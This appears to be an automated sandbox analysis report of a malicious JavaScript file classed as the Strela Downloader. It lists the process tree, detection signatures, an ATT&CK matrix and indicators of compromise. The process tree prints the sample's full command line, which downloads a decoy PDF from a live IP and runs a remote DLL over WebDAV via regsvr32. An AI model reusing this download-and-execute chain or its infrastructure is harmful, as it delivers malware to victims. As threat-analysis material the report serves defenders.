Windows
Analysis Report
958713604204492412.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7308 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\95871 3604204492 412.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7360 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\397 8138462382 7.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7368 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7416 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7612 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7820 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8024 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 32 --field -trial-han dle=1716,i ,715536601 4660057640 ,707461022 652765157, 131072 --d isable-fea tures=Back ForwardCac he,Calcula teNativeWi nOcclusion ,WinUseBro wserSpellC hecker /pr efetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7884 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587926 |
Start date and time: | 2025-01-10 19:29:54 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 52s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 958713604204492412.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 2.16.168.107, 2.16.168.125, 2.16.168.105, 52.22.41.97, 3.233.129.217, 52.6.155.20, 3.219.243.226, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 23.57.90.74, 23.57.90.70, 23.57.90.71, 23.57.90.76, 23.57.90.78, 23.57.90.77, 192.168.2.4, 20.12.23.50, 104.126.112.182, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
13:30:49 | API Interceptor | |
13:30:53 | API Interceptor | |
13:30:53 | API Interceptor | |
13:31:06 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073552561595887 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr0:KooCEYhgYEL0In |
MD5: | 8715BE02E6E160BAC7CE7A5DB1D38067 |
SHA1: | A8B4495E0AC1C97911A9FDB78560153DDE2AF4FC |
SHA-256: | 4E9CBBFE4E0BC1E08D295BD5224FE604AA73813786E804ADDED58E47CE10556C |
SHA-512: | AEBAD063F4EC1595F8C8EF728701FFA8B022F75E891FE3D8E72DE1ED680D56C1E850182F5C0639954D4BD1931F55B2CA1CF6D0EBF109697C9C2E851BE867D3AF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221764435867451 |
Encrypted: | false |
SSDEEP: | 1536:BSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Baza/vMUM2Uvz7DO |
MD5: | 3825CB8362C626B2AE4A770CA21AA8A8 |
SHA1: | D2BCEA6E474451542CA75C970389C6D52A42E2CC |
SHA-256: | 263578C94BDBAD7B19709DF4072458B3A1B99C5CB80AB6FDA741221DBF752876 |
SHA-512: | F982C8D224F76BF46BE324B3507580FD51C0E067739089B87A1E3B342C9C43F2ECF6233200EDF9FE00C97792DD2F0021DF79F2ED31047F54A87518CA1C37757B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
